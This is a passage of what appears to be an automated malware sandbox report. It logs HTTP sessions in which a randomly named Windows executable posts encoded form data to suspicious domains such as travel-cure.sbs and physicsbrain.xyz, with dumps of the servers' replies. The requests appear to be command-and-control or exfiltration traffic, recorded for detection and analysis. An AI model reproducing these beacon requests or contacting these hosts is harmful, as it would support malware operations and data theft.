[TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:26.471110106 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGJiMjQ4OGYtN2IwNC00ZGM3LTk4OTQtNDgxYjg3MjI4ZDRjIiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.452511199.59.243.160802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:28.554032087 CET10939OUTPOST /0c5p/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Origin: http://www.travel-cure.sbs
                                                                        Referer: http://www.travel-cure.sbs/0c5p/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 6f 72 71 64 6c 43 42 47 61 58 48 6d 51 57 55 37 34 33 39 52 47 55 79 59 6d 64 37 66 48 69 7a 6e 62 77 6c 49 57 56 66 42 76 41 53 45 33 4c 52 37 4a 49 64 53 32 2f 61 70 34 6c 71 37 5a 6f 4e 70 7a 61 43 62 52 63 33 56 65 55 49 71 78 73 4d 57 42 4d 63 4b 45 41 4c 37 2f 63 5a 74 48 6e 64 39 4c 75 6e 6e 67 6c 66 4d 66 72 45 67 77 67 70 62 50 73 4a 52 66 35 38 50 73 52 4c 53 32 46 47 37 64 77 57 66 65 32 34 48 7a 42 47 5a 4b 75 49 4a 62 6a 48 64 59 4f 4f 47 56 73 50 39 79 74 55 48 4a 30 45 53 2f 35 59 79 6b 77 44 73 74 56 42 75 72 4c 48 52 57 36 6f 4d 2f 42 6b 73 50 37 37 79 79 41 41 4c 6d 34 76 6b 67 6f 79 61 54 76 74 61 72 61 53 39 4b 33 57 69 37 52 70 57 64 75 47 35 36 53 4c 58 6b 65 62 6c 54 61 62 58 33 4b 42 37 35 2b 58 45 36 39 58 2b 63 65 63 41 45 68 33 55 45 39 6b 4f 47 59 78 4b 76 79 33 48 78 54 51 64 77 73 36 74 4c 55 71 65 75 6f 45 39 67 6c 62 61 6f 6f 79 69 76 4c 54 62 41 6e 61 34 32 37 6d 62 79 2f 36 67 49 54 39 73 48 43 54 63 48 54 6a 73 [TRUNCATED]
                                                                        Data Ascii: JZfd=Um8zWM95iS0bqorqdlCBGaXHmQWU7439RGUyYmd7fHiznbwlIWVfBvASE3LR7JIdS2/ap4lq7ZoNpzaCbRc3VeUIqxsMWBMcKEAL7/cZtHnd9LunnglfMfrEgwgpbPsJRf58PsRLS2FG7dwWfe24HzBGZKuIJbjHdYOOGVsP9ytUHJ0ES/5YykwDstVBurLHRW6oM/BksP77yyAALm4vkgoyaTvtaraS9K3Wi7RpWduG56SLXkeblTabX3KB75+XE69X+cecAEh3UE9kOGYxKvy3HxTQdws6tLUqeuoE9glbaooyivLTbAna427mby/6gIT9sHCTcHTjsIWMzbG0ZWu82RJjCKFA+8pWZW2aOA1doYUbkP8KiyTI1EBZLI70uU8WmwJFYrzU8zvLMHoJQvyDR4tW8AFVOePQVRI5fZ6g4SPSg2myw1wM/UDTxhaq/fMk+4V8kknZz7Aq3fqdTW3VASt2znQZm3mpKcuAmz0DV/LSVJ7qQnOE3cwXhVJGqY28Ue9yLhOSAwv2cPmeHGl4XZ/J3LIJTBKrat5YO5ynLkhaO5KU4IH56xN39B/7Sc7lCQ92Cy6bUag6A+6Q4IjobFAHo8f0oMfYGtc4ZmmFAxCBHEfItmKvXzjshjuXx5sPIy17pP2vWy54OASwItnsJ5YykdE8fvgij/Z0TWg+F2E8Jl0Wvx1+Rjm7GIUDNSXtDJZ5RIKyWdpg69btCZ5PBRHuphQjZ4SHszT/4kyLirjJox1GNm8fJqTemQ3Gl0BNZeGn0ryl0+icmnRY7Y/qPst9xElywAfjO87kTsrFeonE/qMGa/vnflue0S43ebYDORa7RcK+9+M4CFZa5K0fvSoShvDNt8ZNf9e0H0GZ+pdmgbC70A3guXXLvsNBjLox6qlFps9kTjKvVREgoYfE8WM6rqgk1rwNMwCo0sRWU+yB3jfUsecYwA5PmNS8yNwZvcySbJZqn+EHN80vAWJdTM8gEVQ4q1E6r7ksfRTzFna [TRUNCATED]
                                                                        Feb 18, 2025 08:15:29.004501104 CET1236INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:28 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1126
                                                                        X-Request-Id: bf9b5a06-0101-42d9-a713-e235a79da412
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==
                                                                        Set-Cookie: parking_session=bf9b5a06-0101-42d9-a713-e235a79da412; expires=Tue, 18 Feb 2025 07:30:28 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 65 34 4c 52 6b 47 32 51 53 45 57 63 6f 77 64 68 61 64 77 44 6b 41 38 57 30 47 6c 6a 61 79 42 72 45 30 34 6d 4f 6d 63 34 49 48 68 78 48 4a 41 43 73 79 7a 77 33 7a 4c 4b 4f 4a 47 41 6c 62 36 51 77 44 49 61 50 4f 46 56 6e 79 44 47 61 30 6b 4e 45 38 49 70 2b 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_e4LRkG2QSEWcowdhadwDkA8W0GljayBrE04mOmc4IHhxHJACsyzw3zLKOJGAlb6QwDIaPOFVnyDGa0kNE8Ip+w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:29.004616976 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmY5YjVhMDYtMDEwMS00MmQ5LWE3MTMtZTIzNWE3OWRhNDEyIiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.452532199.59.243.160802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:31.090898037 CET570OUTGET /0c5p/?JZfd=ZkUTV7pI9Ap5vIyRRAq5W5SemCe80v7MV0MOYxheQ3+8mZZcGVhaedsyExvQ8P0JBljjtNlykIwC9TSJUDwzYqYInCYcfCsRcBd6++ZWi3nQtc+XigtdVu0=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.travel-cure.sbs
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:31.565486908 CET1236INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:15:30 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 1462
                                                                        X-Request-Id: c8c289de-3374-499e-ba23-56e956172565
                                                                        Cache-Control: no-store, max-age=0
                                                                        Accept-Ch: sec-ch-prefers-color-scheme
                                                                        Critical-Ch: sec-ch-prefers-color-scheme
                                                                        Vary: sec-ch-prefers-color-scheme
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mSVhM3YZSnMhNfayv2+7fCjHcpuRmbtwldyTAiHG2t7zWQS+ChT3TTTEVwRySRC3OUSY+sgRqBANzVlSjksfJw==
                                                                        Set-Cookie: parking_session=c8c289de-3374-499e-ba23-56e956172565; expires=Tue, 18 Feb 2025 07:30:31 GMT; path=/
                                                                        Connection: close
                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 53 56 68 4d 33 59 5a 53 6e 4d 68 4e 66 61 79 76 32 2b 37 66 43 6a 48 63 70 75 52 6d 62 74 77 6c 64 79 54 41 69 48 47 32 74 37 7a 57 51 53 2b 43 68 54 33 54 54 54 45 56 77 52 79 53 52 43 33 4f 55 53 59 2b 73 67 52 71 42 41 4e 7a 56 6c 53 6a 6b 73 66 4a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mSVhM3YZSnMhNfayv2+7fCjHcpuRmbtwldyTAiHG2t7zWQS+ChT3TTTEVwRySRC3OUSY+sgRqBANzVlSjksfJw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                        Feb 18, 2025 08:15:31.565531969 CET915INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzhjMjg5ZGUtMzM3NC00OTllLWJhMjMtNTZlOTU2MTcyNTY1IiwicGFnZV90aW1lIjoxNzM5ODYyOT


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.45256813.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:36.608201027 CET840OUTPOST /ajxq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Origin: http://www.physicsbrain.xyz
                                                                        Referer: http://www.physicsbrain.xyz/ajxq/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 201
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 32 61 74 41 51 65 59 38 71 56 46 42 78 4f 47 7a 7a 65 75 46 79 63 4f 52 4c 67 42 4d 62 63 79 78 78 66 70 4b 4b 2b 79 2f 56 6f 73 31 35 4a 61 67 49 75 46 69 77 71 49 38 64 6c 53 50 30 50 30 2f 39 62 48 6b 32 2b 6e 69 33 42 47 62 42 38 62 65 48 59 33 50 6c 4f 47 66 31 71 4d 64 2b 37 38 78 6d 70 61 68 59 66 5a 53 4c 4a 5a 4a 55 4a 56 36 67 61 4a 2f 6f 61 2f 41 68 64 44 68 43 6e 45 4f 4b 57 6f 45 6e 68 7a 6a 2b 32 72 78 35 64 46 78 67 36 65 67 50 42 68 57 5a 78 59 6c 49 73 30 39 76 31 55 4b 62 73 63 4a 59 62 58 6c 6e 50 2b 2f 62 49 44 55 6e 6b 62 77 48 30 73 4e 46 43 43 33 77 3d 3d
                                                                        Data Ascii: JZfd=U2atAQeY8qVFBxOGzzeuFycORLgBMbcyxxfpKK+y/Vos15JagIuFiwqI8dlSP0P0/9bHk2+ni3BGbB8beHY3PlOGf1qMd+78xmpahYfZSLJZJUJV6gaJ/oa/AhdDhCnEOKWoEnhzj+2rx5dFxg6egPBhWZxYlIs09v1UKbscJYbXlnP+/bIDUnkbwH0sNFCC3w==
                                                                        Feb 18, 2025 08:15:37.053355932 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.45258413.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:39.254173994 CET860OUTPOST /ajxq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Origin: http://www.physicsbrain.xyz
                                                                        Referer: http://www.physicsbrain.xyz/ajxq/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 221
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 32 61 74 41 51 65 59 38 71 56 46 41 51 2b 47 6f 54 69 75 51 43 63 42 55 4c 67 42 56 4c 63 32 78 78 54 70 4b 4c 37 71 2f 68 45 73 79 62 52 61 79 64 43 46 68 77 71 49 6f 74 6b 57 43 55 50 42 2f 39 48 35 6b 7a 47 6e 69 33 56 47 62 44 30 62 65 32 59 32 4a 31 4f 45 58 56 71 4f 58 65 37 38 78 6d 70 61 68 59 62 2f 53 49 35 5a 4a 67 4e 56 31 68 61 4b 33 49 61 38 44 68 64 44 6c 43 6e 41 4f 4b 57 4f 45 69 41 55 6a 34 36 72 78 38 78 46 78 31 61 5a 35 66 42 6a 62 35 78 4c 69 72 59 35 7a 4e 6f 44 55 34 77 6a 43 35 53 79 6b 68 43 6b 75 71 70 55 47 6e 41 6f 74 41 39 59 41 47 2f 4c 73 77 4a 48 66 43 41 6c 47 42 57 78 61 44 63 41 43 43 35 56 50 79 4d 3d
                                                                        Data Ascii: JZfd=U2atAQeY8qVFAQ+GoTiuQCcBULgBVLc2xxTpKL7q/hEsybRaydCFhwqIotkWCUPB/9H5kzGni3VGbD0be2Y2J1OEXVqOXe78xmpahYb/SI5ZJgNV1haK3Ia8DhdDlCnAOKWOEiAUj46rx8xFx1aZ5fBjb5xLirY5zNoDU4wjC5SykhCkuqpUGnAotA9YAG/LswJHfCAlGBWxaDcACC5VPyM=
                                                                        Feb 18, 2025 08:15:39.727627039 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.45260013.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:41.802930117 CET10942OUTPOST /ajxq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Origin: http://www.physicsbrain.xyz
                                                                        Referer: http://www.physicsbrain.xyz/ajxq/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10301
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Data Raw: 4a 5a 66 64 3d 55 32 61 74 41 51 65 59 38 71 56 46 41 51 2b 47 6f 54 69 75 51 43 63 42 55 4c 67 42 56 4c 63 32 78 78 54 70 4b 4c 37 71 2f 68 4d 73 79 75 46 61 67 75 36 46 67 77 71 49 30 39 6b 56 43 55 50 6d 2f 39 4f 2b 6b 7a 43 33 69 30 74 47 61 67 73 62 4f 43 4d 32 41 31 4f 45 56 56 71 4e 64 2b 36 32 78 69 46 65 68 59 4c 2f 53 49 35 5a 4a 6d 68 56 78 77 61 4b 36 6f 61 2f 41 68 64 50 68 43 6d 66 4f 4b 75 77 45 69 4e 6a 67 49 61 72 78 63 68 46 2b 6d 79 5a 6d 50 42 74 49 4a 77 57 69 72 46 35 7a 4e 6b 50 55 37 73 4a 43 35 57 79 6b 45 66 6e 79 4a 56 32 63 58 55 36 36 69 77 36 4e 45 54 4d 33 6a 64 44 61 79 30 4c 63 54 62 61 51 41 31 52 5a 53 68 68 53 69 37 4b 49 39 63 56 42 35 70 63 79 4b 7a 57 43 6d 79 30 37 75 67 75 37 57 31 39 31 48 39 65 36 72 54 55 79 4d 51 30 50 6c 48 6a 77 30 73 41 43 6d 49 47 51 70 58 62 53 47 2f 4b 6b 58 4d 48 41 37 31 6d 33 71 42 35 41 30 76 53 5a 72 30 36 63 57 54 57 69 69 47 49 53 6b 46 74 55 4d 69 57 48 74 74 4f 68 6a 72 6a 65 43 34 49 6e 70 2f 47 71 51 4e 52 47 77 6c 42 55 [TRUNCATED]
                                                                        Data Ascii: JZfd=U2atAQeY8qVFAQ+GoTiuQCcBULgBVLc2xxTpKL7q/hMsyuFagu6FgwqI09kVCUPm/9O+kzC3i0tGagsbOCM2A1OEVVqNd+62xiFehYL/SI5ZJmhVxwaK6oa/AhdPhCmfOKuwEiNjgIarxchF+myZmPBtIJwWirF5zNkPU7sJC5WykEfnyJV2cXU66iw6NETM3jdDay0LcTbaQA1RZShhSi7KI9cVB5pcyKzWCmy07ugu7W191H9e6rTUyMQ0PlHjw0sACmIGQpXbSG/KkXMHA71m3qB5A0vSZr06cWTWiiGISkFtUMiWHttOhjrjeC4Inp/GqQNRGwlBUtCFhiw5rvMl0j++5Fr6h3TIbkCGHHw0XFHNXYD5eZ145dKICFBYMcxRgZyPCvrefz5pQBw6jMKG0ZwfhtehNA23faB8jtFJe3haDpPRhvbzoMz2cxTGc8HPcUun+WA8F65mi4HYdA6CUIneNsTjJeYl5Q/oorE7yd2QcrrbVYDXzkLYqyNdk3wtVxC4PJvukfso5ut2eJtxnz3jumKxjCyKxZ3j/NTNbGKjyCRDEJzyQDIbWwh5G2pRySwbKOdWDBcwjuYiXVdqnWPCntokHpNZ3pzm4cnXe1jzxHF8s8iQFS0MqcKET7gsDOJHGISFPJa3ep3NBRhQyYR9PxN/PVV+jk/YSFycvK6vhcSw1a/cRMWqdxMVVOuOBcWF8m98QeIWvLRRWKiyW6zuUwGOgGJRnecJf2qLRlmrPGDN8lb4m0pM6ypDCMsb1oOM7Y/jG8cMmRA+vywE7mq0oBzFdwAuyFyCAKmz/tS6YVBW33IjotFL386IguESGKQu+nz5MSrx77r76i9aThgMPVNsyudBEPImZVkuEEZ8s+2LN1f5jNORg3pYFkme19L04MEb6p9VDpc5YSyKETLJWw3UusjPcChWCShjAvjY1n7qdNxne7dSKj3lOQPr7M61UKg78nJUzmmwgHyma278Kk1vDRgPOgN4KixXIqi [TRUNCATED]
                                                                        Feb 18, 2025 08:15:42.251498938 CET73INHTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.45261913.248.169.48802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:44.341515064 CET571OUTGET /ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Host: www.physicsbrain.xyz
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                                                                        Feb 18, 2025 08:15:44.792871952 CET377INHTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Tue, 18 Feb 2025 07:15:44 GMT
                                                                        content-length: 256
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 5a 66 64 3d 5a 30 79 4e 44 6e 4b 35 33 4a 67 74 4d 53 4c 74 2f 51 2b 64 53 7a 30 48 57 71 77 6b 4e 75 6f 70 30 41 4c 35 4c 72 62 39 35 54 59 65 7a 5a 63 43 6b 2b 47 42 6a 6a 43 32 72 4f 35 41 50 33 6e 61 38 4f 54 50 6a 6a 32 63 79 55 52 77 4e 6a 30 55 65 6e 70 35 48 6a 76 35 53 58 72 74 59 4b 32 42 6d 47 77 45 70 59 58 76 57 70 68 69 58 58 31 36 31 53 71 54 76 59 77 3d 26 32 38 74 3d 5f 44 6c 48 39 46 4e 70 4a 62 75 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.452656162.0.231.203802924C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:15:49.852987051 CET834OUTPOST /rvdc/ HTTP/1.1
